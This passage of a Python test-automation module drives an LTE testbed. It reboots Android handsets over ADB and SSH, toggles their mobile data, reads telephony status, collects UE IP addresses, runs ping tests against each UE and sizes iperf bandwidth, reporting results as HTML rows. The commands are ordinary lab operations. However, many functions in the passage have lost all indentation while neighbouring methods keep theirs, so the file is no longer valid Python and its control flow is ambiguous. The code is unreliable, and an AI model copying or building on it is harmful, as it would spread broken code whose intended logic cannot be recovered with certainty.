				if result is None:
					mDataConnectionState = None
				else:
					mDataConnectionState = int(result.group('state'))
					logging.debug('mDataConnectionState = ' + result.group('state'))
				# not readable yet, or was connected (2) before and is not yet back
				if mDataConnectionState is None or (previousmDataConnectionState == 2 and mDataConnectionState != 2):
					logging.debug('\u001B[1mWait UE (' + device_id + ') a second until reboot completion (' + str(180-count) + ' times)\u001B[0m')
					time.sleep(1)
				else:
					logging.debug('\u001B[1mUE (' + device_id + ') Reboot Completed\u001B[0m')
					break
			if count == 0:
				logging.debug('\u001B[1;37;41m UE (' + device_id + ') Reboot Failed \u001B[0m')
				sys.exit(1)
			SSH.close()
		except:
			# worker convention in this file: any failure signals the parent
			os.kill(os.getppid(),signal.SIGUSR1)
def RebootUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow('N/A', 'KO', pStatus)
HTML.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.RebootUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def DataDisableUE_common(self, device_id, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# disable data service
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data disable"', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data disable"\'', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Disabled Data Service\u001B[0m')
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataDisableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.DataDisableUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def DataEnableUE_common(self, device_id, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data enable"', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Enabled Data Service\u001B[0m')
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataEnableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.DataEnableUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
	def GetAllUEDevices(self, terminate_ue_flag):
		"""Populate self.UEDevices from `adb devices` or a remote phones_list.txt.

		Centralized mode parses `adb devices` output; decentralized mode fetches
		/etc/ci/phones_list.txt (CSV: serial,server,user,off-cmd,on-cmd,reboot-cmd)
		and fills the per-device remote-control lists.  When terminate_ue_flag is
		True an empty device list is fatal.  Device statuses default to DETACHED.
		"""
		if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
		if self.ADBCentralized:
			SSH.command('adb devices', '\$', 15)
			# serial numbers appear as "<serial>\tdevice" lines in the echoed output
			self.UEDevices = re.findall("\\\\r\\\\n([A-Za-z0-9]+)\\\\tdevice",SSH.getBefore())
			SSH.close()
		else:
			# start from a clean local copy of the phone list
			if (os.path.isfile('./phones_list.txt')):
				os.remove('./phones_list.txt')
			SSH.command('ls /etc/*/phones*.txt', '\$', 5)
			result = re.search('/etc/ci/phones_list.txt', SSH.getBefore())
			SSH.close()
			# only (re)load when the file exists and the list was not filled yet
			if (result is not None) and (len(self.UEDevices) == 0):
				SSH.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, '/etc/ci/phones_list.txt', '.')
				if (os.path.isfile('./phones_list.txt')):
					phone_list_file = open('./phones_list.txt', 'r')
					for line in phone_list_file.readlines():
						line = line.strip()
						# skip comment lines
						result = re.search('^#', line)
						if result is not None:
							continue
						# CSV columns: serial, remote server, remote user, off/on/reboot commands
						comma_split = line.split(",")
						self.UEDevices.append(comma_split[0])
						self.UEDevicesRemoteServer.append(comma_split[1])
						self.UEDevicesRemoteUser.append(comma_split[2])
						self.UEDevicesOffCmd.append(comma_split[3])
						self.UEDevicesOnCmd.append(comma_split[4])
						self.UEDevicesRebootCmd.append(comma_split[5])
					phone_list_file.close()
		if terminate_ue_flag == True:
			if len(self.UEDevices) == 0:
				logging.debug('\u001B[1;37;41m UE Not Found! \u001B[0m')
				sys.exit(1)
		if len(self.UEDevicesStatus) == 0:
			cnt = 0
			while cnt < len(self.UEDevices):
				self.UEDevicesStatus.append(CONST.UE_STATUS_DETACHED)
				cnt += 1
	def GetAllCatMDevices(self, terminate_ue_flag):
		"""Populate self.CatMDevices by scanning USB for FT2232C serial bridges.

		Centralized mode parses `lsusb` output; the decentralized branch only
		checks for a modules_list.txt on the ADB server (not parsed yet).  When
		terminate_ue_flag is True an empty module list is fatal.
		"""
		if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
		if self.ADBCentralized:
			# the sed turns "Bus XXX Device YYY: ..." into a usable identifier
			SSH.command('lsusb | egrep "Future Technology Devices International, Ltd FT2232C" | sed -e "s#:.*##" -e "s# #_#g"', '\$', 15)
			#self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",SSH.getBefore())
			self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",SSH.getBefore())
		else:
			if (os.path.isfile('./modules_list.txt')):
				os.remove('./modules_list.txt')
			SSH.command('ls /etc/*/modules*.txt', '\$', 5)
			result = re.search('/etc/ci/modules_list.txt', SSH.getBefore())
			# NOTE(review): this branch closes the session here AND at the end of
			# the method (double SSH.close) — presumably harmless; confirm.
			SSH.close()
			if result is not None:
				logging.debug('Found a module list file on ADB server')
		if terminate_ue_flag == True:
			if len(self.CatMDevices) == 0:
				logging.debug('\u001B[1;37;41m CAT-M UE Not Found! \u001B[0m')
				sys.exit(1)
		SSH.close()
def CheckUEStatus_common(self, lock, device_id, statusQueue, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "dumpsys telephony.registry"', '\$', 15)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "dumpsys telephony.registry"\'', '\$', 60)
result = re.search('mServiceState=(?P<serviceState>[0-9]+)', SSH.getBefore())
serviceState = 'Service State: UNKNOWN'
if result is not None:
lServiceState = int(result.group('serviceState'))
if lServiceState == 3:
serviceState = 'Service State: RADIO_POWERED_OFF'
if lServiceState == 1:
serviceState = 'Service State: OUT_OF_SERVICE'
if lServiceState == 0:
serviceState = 'Service State: IN_SERVICE'
if lServiceState == 2:
serviceState = 'Service State: EMERGENCY_ONLY'
result = re.search('mDataConnectionState=(?P<dataConnectionState>[0-9]+)', SSH.getBefore())
dataConnectionState = 'Data State: UNKNOWN'
if result is not None:
lDataConnectionState = int(result.group('dataConnectionState'))
if lDataConnectionState == 0:
dataConnectionState = 'Data State: DISCONNECTED'
if lDataConnectionState == 1:
dataConnectionState = 'Data State: CONNECTING'
if lDataConnectionState == 2:
dataConnectionState = 'Data State: CONNECTED'
if lDataConnectionState == 3:
dataConnectionState = 'Data State: SUSPENDED'
result = re.search('mDataConnectionReason=(?P<dataConnectionReason>[0-9a-zA-Z_]+)', SSH.getBefore())
dataConnectionReason = 'Data Reason: UNKNOWN'
if result is not None:
dataConnectionReason = 'Data Reason: ' + result.group('dataConnectionReason')
lock.acquire()
logging.debug('\u001B[1;37;44m Status Check (' + str(device_id) + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + serviceState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionReason + '\u001B[0m')
statusQueue.put(0)
statusQueue.put(device_id)
qMsg = serviceState + '\n' + dataConnectionState + '\n' + dataConnectionReason
statusQueue.put(qMsg)
lock.release()
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
	def CheckStatusUE(self):
		"""Check the service/data status of every UE and (optionally) the eNB RNTI count.

		Runs one CheckUEStatus_common worker per device.  When a FlexRAN
		controller is running, also compares the number of connected UEs reported
		by its stats endpoint against self.expectedNbOfConnectedUEs.  Writes an
		HTML row; any failure triggers AutoTerminateUEandeNB().
		"""
		if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		check_eNB = True
		check_OAI_UE = False
		pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
		if (pStatus < 0):
			HTML.CreateHtmlTestRow('N/A', 'KO', pStatus)
			HTML.CreateHtmlTabFooter(False)
			sys.exit(1)
		multi_jobs = []
		lock = Lock()
		status_queue = SimpleQueue()
		i = 0
		for device_id in self.UEDevices:
			p = Process(target = self.CheckUEStatus_common, args = (lock,device_id,status_queue,i,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
			i += 1
		for job in multi_jobs:
			job.join()
		# cross-check against the FlexRAN controller's view when available
		if RAN.flexranCtrlInstalled and RAN.flexranCtrlStarted:
			SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
			SSH.command('cd /opt/flexran_rtc', '\$', 5)
			SSH.command('curl http://localhost:9999/stats | jq \'.\' > log/check_status_' + self.testCase_id + '.log 2>&1', '\$', 5)
			# count the rnti entries = number of UEs the eNB sees as connected
			SSH.command('cat log/check_status_' + self.testCase_id + '.log | jq \'.eNB_config[0].UE\' | grep -c rnti | sed -e "s#^#Nb Connected UE = #"', '\$', 5)
			result = re.search('Nb Connected UE = (?P<nb_ues>[0-9]+)', SSH.getBefore())
			passStatus = True
			if result is not None:
				nb_ues = int(result.group('nb_ues'))
				htmlOptions = 'Nb Connected UE(s) to eNB = ' + str(nb_ues)
				logging.debug('\u001B[1;37;44m ' + htmlOptions + ' \u001B[0m')
				# expectedNbOfConnectedUEs == -1 means "do not enforce a count"
				if self.expectedNbOfConnectedUEs > -1:
					if nb_ues != self.expectedNbOfConnectedUEs:
						passStatus = False
			else:
				htmlOptions = 'N/A'
			SSH.close()
		else:
			passStatus = True
			htmlOptions = 'N/A'
		if (status_queue.empty()):
			# no worker reported anything: treat as global failure
			HTML.CreateHtmlTestRow(htmlOptions, 'KO', CONST.ALL_PROCESSES_OK)
			self.AutoTerminateUEandeNB()
		else:
			check_status = True
			html_queue = SimpleQueue()
			while (not status_queue.empty()):
				# each worker pushed exactly three items: count, device, message
				count = status_queue.get()
				if (count < 0):
					check_status = False
				device_id = status_queue.get()
				message = status_queue.get()
				html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
				html_queue.put(html_cell)
			if check_status and passStatus:
				HTML.CreateHtmlTestRowQueue(htmlOptions, 'OK', len(self.UEDevices), html_queue)
			else:
				HTML.CreateHtmlTestRowQueue(htmlOptions, 'KO', len(self.UEDevices), html_queue)
				self.AutoTerminateUEandeNB()
def GetAllUEIPAddresses(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
ue_ip_status = 0
self.UEIPAddresses = []
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('ifconfig oaitun_ue1', '\$', 4)
result = re.search('inet addr:(?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|inet (?P<ueipaddress2>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', SSH.getBefore())
if result is not None:
if result.group('ueipaddress') is not None:
UE_IPAddress = result.group('ueipaddress')
else:
UE_IPAddress = result.group('ueipaddress2')
logging.debug('\u001B[1mUE (' + self.UEDevices[0] + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
self.UEIPAddresses.append(UE_IPAddress)
else:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
ue_ip_status -= 1
SSH.close()
return ue_ip_status
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
idx = 0
for device_id in self.UEDevices:
if self.UEDevicesStatus[idx] != CONST.UE_STATUS_ATTACHED:
idx += 1
continue
count = 0
while count < 4:
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "ip addr show | grep rmnet"', '\$', 15)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ip addr show | grep rmnet"\'', '\$', 60)
result = re.search('inet (?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/[0-9]+[0-9a-zA-Z\.\s]+', SSH.getBefore())
if result is None:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
time.sleep(1)
count += 1
else:
count = 10
if count < 9:
ue_ip_status -= 1
continue
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + device_id + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
for ueipaddress in self.UEIPAddresses:
if ueipaddress == UE_IPAddress:
logging.debug('\u001B[1mUE (' + device_id + ') IP Address ' + UE_IPAddress + ': has already been allocated to another device !' + '\u001B[0m')
ue_ip_status -= 1
continue
self.UEIPAddresses.append(UE_IPAddress)
idx += 1
SSH.close()
return ue_ip_status
def ping_iperf_wrong_exit(self, lock, UE_IPAddress, device_id, statusQueue, message):
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(message)
lock.release()
	def Ping_common(self, lock, UE_IPAddress, device_id, statusQueue):
		"""Ping one UE's IP address and push the outcome onto statusQueue.

		Runs as a per-UE child process.  The queued record is 4 items:
		status (0 ok / -1 failure), device_id, UE_IPAddress and a
		human-readable message.  On any unexpected exception the parent
		process is signalled with SIGUSR1 to abort the test run.
		"""
		try:
			# Launch ping on the EPC side (true for ltebox and old open-air-cn)
			# But for OAI-Rel14-CUPS, we launch from python executor
			launchFromEpc = True
			if re.match('OAI-Rel14-CUPS', EPC.Type, re.IGNORECASE):
				launchFromEpc = False
			# '-c <count>' gives the number of pings; used to size the command timeout.
			ping_time = re.findall("-c (\d+)",str(self.ping_args))
			if launchFromEpc:
				SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
				SSH.command('cd ' + EPC.SourceCodePath, '\$', 5)
				SSH.command('cd scripts', '\$', 5)
				ping_status = SSH.command('stdbuf -o0 ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
			else:
				# Ping locally, then push the log to the EPC so analysis and
				# later log collection find it in the usual place.
				cmd = 'ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 > ping_' + self.testCase_id + '_' + device_id + '.log'
				message = cmd + '\n'
				logging.debug(cmd)
				ret = subprocess.run(cmd, shell=True)
				ping_status = ret.returncode
				SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'ping_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
				SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
				SSH.command('cat ' + EPC.SourceCodePath + '/scripts/ping_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
			# TIMEOUT CASE
			if ping_status < 0:
				message = 'Ping with UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				SSH.close()
				self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
				return
			# Parse the ping summary line for the packet-loss percentage.
			result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', SSH.getBefore())
			if result is None:
				message = 'Packet Loss Not Found!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				SSH.close()
				self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
				return
			packetloss = result.group('packetloss')
			if float(packetloss) == 100:
				message = 'Packet Loss is 100%'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				SSH.close()
				self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
				return
			# Parse the 'rtt min/avg/max/mdev' statistics line.
			result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', SSH.getBefore())
			if result is None:
				message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				SSH.close()
				self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
				return
			rtt_min = result.group('rtt_min')
			rtt_avg = result.group('rtt_avg')
			rtt_max = result.group('rtt_max')
			pal_msg = 'Packet Loss : ' + packetloss + '%'
			min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
			avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
			max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
			# Serialize logging and queueing across the concurrent per-UE processes.
			lock.acquire()
			logging.debug('\u001B[1;37;44m ping result (' + UE_IPAddress + ') \u001B[0m')
			logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
			qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
			packetLossOK = True
			if packetloss is not None:
				if float(packetloss) > float(self.ping_packetloss_threshold):
					qMsg += '\nPacket Loss too high'
					logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
					packetLossOK = False
				elif float(packetloss) > 0:
					# Non-zero loss below the threshold: warn but still pass.
					qMsg += '\nPacket Loss is not 0%'
					logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
			if (packetLossOK):
				statusQueue.put(0)
			else:
				statusQueue.put(-1)
			statusQueue.put(device_id)
			statusQueue.put(UE_IPAddress)
			statusQueue.put(qMsg)
			lock.release()
			SSH.close()
		except:
			# Any unexpected error aborts the whole run via the parent process.
			os.kill(os.getppid(),signal.SIGUSR1)
	def PingNoS1_wrong_exit(self, qMsg):
		"""Record a failed noS1 ping run as a 'KO' row in the HTML report.

		qMsg -- text describing the failure, shown in the result cell.
		"""
		html_queue = SimpleQueue()
		html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
		html_queue.put(html_cell)
		HTML.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
	def PingNoS1(self):
		"""Run a ping test in noS1 (no core network) mode over the OAI tunnels.

		The ping runs from the eNB when the arguments target the eNB tunnel
		interface ('oaitun_enb1'), otherwise from the OAI UE host.  Results
		(packet loss, RTT min/avg/max) are parsed from the ping output and
		reported as an HTML row; the log file is copied to the EPC host for
		log collection.  On unexpected exceptions the parent process is
		signalled with SIGUSR1.
		"""
		check_eNB = True
		check_OAI_UE = True
		pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
		if (pStatus < 0):
			HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
			self.AutoTerminateUEandeNB()
			return
		# Pinging the eNB tunnel interface means we must run from the eNB host.
		ping_from_eNB = re.search('oaitun_enb1', str(self.ping_args))
		if ping_from_eNB is not None:
			if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '':
				HELP.GenericHelp(CONST.Version)
				sys.exit('Insufficient Parameter')
		else:
			if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
				HELP.GenericHelp(CONST.Version)
				sys.exit('Insufficient Parameter')
		try:
			if ping_from_eNB is not None:
				SSH.open(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword)
				SSH.command('cd ' + RAN.eNBSourceCodePath + '/cmake_targets/', '\$', 5)
			else:
				SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
				SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets/', '\$', 5)
			# '-c <count>' sizes the SSH command timeout.
			ping_time = re.findall("-c (\d+)",str(self.ping_args))
			ping_status = SSH.command('stdbuf -o0 ping ' + self.ping_args + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '.log', '\$', int(ping_time[0])*1.5)
			# TIMEOUT CASE
			if ping_status < 0:
				message = 'Ping with OAI UE crashed due to TIMEOUT!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				self.PingNoS1_wrong_exit(message)
				return
			# Packet-loss percentage from the ping summary line.
			result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', SSH.getBefore())
			if result is None:
				message = 'Packet Loss Not Found!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				self.PingNoS1_wrong_exit(message)
				return
			packetloss = result.group('packetloss')
			if float(packetloss) == 100:
				message = 'Packet Loss is 100%'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				self.PingNoS1_wrong_exit(message)
				return
			# RTT statistics line.
			result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', SSH.getBefore())
			if result is None:
				message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				self.PingNoS1_wrong_exit(message)
				return
			rtt_min = result.group('rtt_min')
			rtt_avg = result.group('rtt_avg')
			rtt_max = result.group('rtt_max')
			pal_msg = 'Packet Loss : ' + packetloss + '%'
			min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
			avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
			max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
			logging.debug('\u001B[1;37;44m OAI UE ping result \u001B[0m')
			logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
			qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
			packetLossOK = True
			if packetloss is not None:
				if float(packetloss) > float(self.ping_packetloss_threshold):
					qMsg += '\nPacket Loss too high'
					logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
					packetLossOK = False
				elif float(packetloss) > 0:
					# Non-zero loss below the threshold: warn but still pass.
					qMsg += '\nPacket Loss is not 0%'
					logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
			SSH.close()
			html_queue = SimpleQueue()
			ip_addr = 'TBD'
			html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
			html_queue.put(html_cell)
			if packetLossOK:
				HTML.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
			else:
				HTML.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
			# copying on the EPC server for logCollection
			if ping_from_eNB is not None:
				copyin_res = SSH.copyin(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
			else:
				copyin_res = SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
			if (copyin_res == 0):
				SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'ping_' + self.testCase_id + '.log', EPC.SourceCodePath + '/scripts')
		except:
			# Any unexpected error aborts the whole run via the parent process.
			os.kill(os.getppid(),signal.SIGUSR1)
	def Ping(self):
		"""Entry point for the ping test case: ping every attached UE in parallel.

		Dispatches to PingNoS1() when the eNB was started in noS1 mode.
		Otherwise, one child process per UE IP address runs Ping_common();
		results are gathered from status_queue (4 items per UE: status,
		device id, IP, message) and rendered as one HTML row.  Any failure
		triggers automatic termination of UEs and eNB.
		"""
		result = re.search('noS1', str(RAN.Initialize_eNB_args))
		if result is not None:
			self.PingNoS1()
			return
		if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		check_eNB = True
		# Only check the OAI UE process when the single device under test is the OAI soft UE.
		if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
			check_OAI_UE = True
		else:
			check_OAI_UE = False
		pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
		if (pStatus < 0):
			HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
			self.AutoTerminateUEandeNB()
			return
		ueIpStatus = self.GetAllUEIPAddresses()
		if (ueIpStatus < 0):
			HTML.CreateHtmlTestRow(self.ping_args, 'KO', CONST.UE_IP_ADDRESS_ISSUE)
			self.AutoTerminateUEandeNB()
			return
		# Fan out one ping process per UE; a shared lock serializes their reporting.
		multi_jobs = []
		i = 0
		lock = Lock()
		status_queue = SimpleQueue()
		for UE_IPAddress in self.UEIPAddresses:
			device_id = self.UEDevices[i]
			p = Process(target = self.Ping_common, args = (lock,UE_IPAddress,device_id,status_queue,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
			i = i + 1
		for job in multi_jobs:
			job.join()
		if (status_queue.empty()):
			# No child managed to report anything: treat as global failure.
			HTML.CreateHtmlTestRow(self.ping_args, 'KO', CONST.ALL_PROCESSES_OK)
			self.AutoTerminateUEandeNB()
		else:
			ping_status = True
			html_queue = SimpleQueue()
			while (not status_queue.empty()):
				# Each child queued 4 items in order: status, device, IP, message.
				count = status_queue.get()
				if (count < 0):
					ping_status = False
				device_id = status_queue.get()
				ip_addr = status_queue.get()
				message = status_queue.get()
				html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
				html_queue.put(html_cell)
			if (ping_status):
				HTML.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
			else:
				HTML.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
				self.AutoTerminateUEandeNB()
def Iperf_ComputeTime(self):
result = re.search('-t (?P<iperf_time>\d+)', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf time Not Found! \u001B[0m')
sys.exit(1)
return result.group('iperf_time')
def Iperf_ComputeModifiedBW(self, idx, ue_num):
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf bandwidth Not Found! \u001B[0m')
sys.exit(1)
iperf_bandwidth = result.group('iperf_bandwidth')
if self.iperf_profile == 'balanced':
iperf_bandwidth_new = float(iperf_bandwidth)/ue_num
if self.iperf_profile == 'single-ue':
iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'unbalanced':
# residual is 2% of max bw
residualBW = float(iperf_bandwidth) / 50
if idx == 0:
iperf_bandwidth_new = float(iperf_bandwidth) - ((ue_num - 1) * residualBW)
else:
iperf_bandwidth_new = residualBW
iperf_bandwidth_str = '-b ' + iperf_bandwidth
iperf_bandwidth_str_new = '-b ' + ('%.2f' % iperf_bandwidth_new)
result = re.sub(iperf_bandwidth_str, iperf_bandwidth_str_new, str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Calculate Iperf bandwidth Failed! \u001B[0m')
sys.exit(1)
return result
	def Iperf_analyzeV2TCPOutput(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
		"""Analyze a TCP iperf (v2) run from its client log on the EPC host.

		Runs an awk post-processing script over the log and, when the
		Avg/Max/Min bitrate summary is found, queues a success record
